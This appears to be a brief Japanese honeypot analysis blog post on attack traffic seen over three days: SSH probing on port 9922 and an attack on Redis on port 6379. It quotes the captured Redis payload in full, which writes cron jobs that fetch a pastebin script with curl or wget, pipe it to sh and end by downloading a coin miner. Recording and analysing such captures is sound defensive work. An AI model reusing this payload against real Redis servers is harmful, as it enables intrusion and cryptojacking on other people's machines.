Honeytrapの簡易分析となります。

◾️10/25-10/27 Honeytrap分析(80ポートを除く)

 ＜宛先ポート通信＞

<宛先ポート 9922の通信>
9922ポート宛の通信が増加していますが、中身はSSHへのアクセスを狙った調査行為の通信
ペイロード：
SSH-2.0-libssh2_1.4.3..

<宛先ポート 6379の通信>
検知数は多いものの、気になったので調査しました。Redisサーバを狙った脆弱性と思われます。最終的にはCoinMinerのダウンロードを試みていますが、ダウンロード用のスクリプトで様々なサービスをkillしたりしていました。

ペイロード：
set backuper1 "\n\n\n*/1 * * * * root (curl -fsSL hxxps://pastebin.com/raw/xbY7p5Tb||wget -q -O- hxxps://pastebin.com/raw/xbY7p5Tb)|sh\n\n\n"..set backuper2 "\n\n\n*/1 * * * * (curl -fsSL hxxps://pastebin.com/raw/xbY7p5Tb||wget -q -O- hxxps://pastebin.com/raw/xbY7p5Tb)|sh\n\n\n"..config set dir /etc/cron.d/..config set dbfilename root..save..config set dir /var/spool/cron/..config set dbfilename root..save..config set dir /var/spool/cron/crontabs/..config set dbfilename root..save..

→hxxps://pastebin[.]com/raw/uuYVPLXd で取得した文字列をBase64でデコード
→CoinMinerのダウンロード

マルウェアの傾向は大きく変化していませんでした。

以上となります。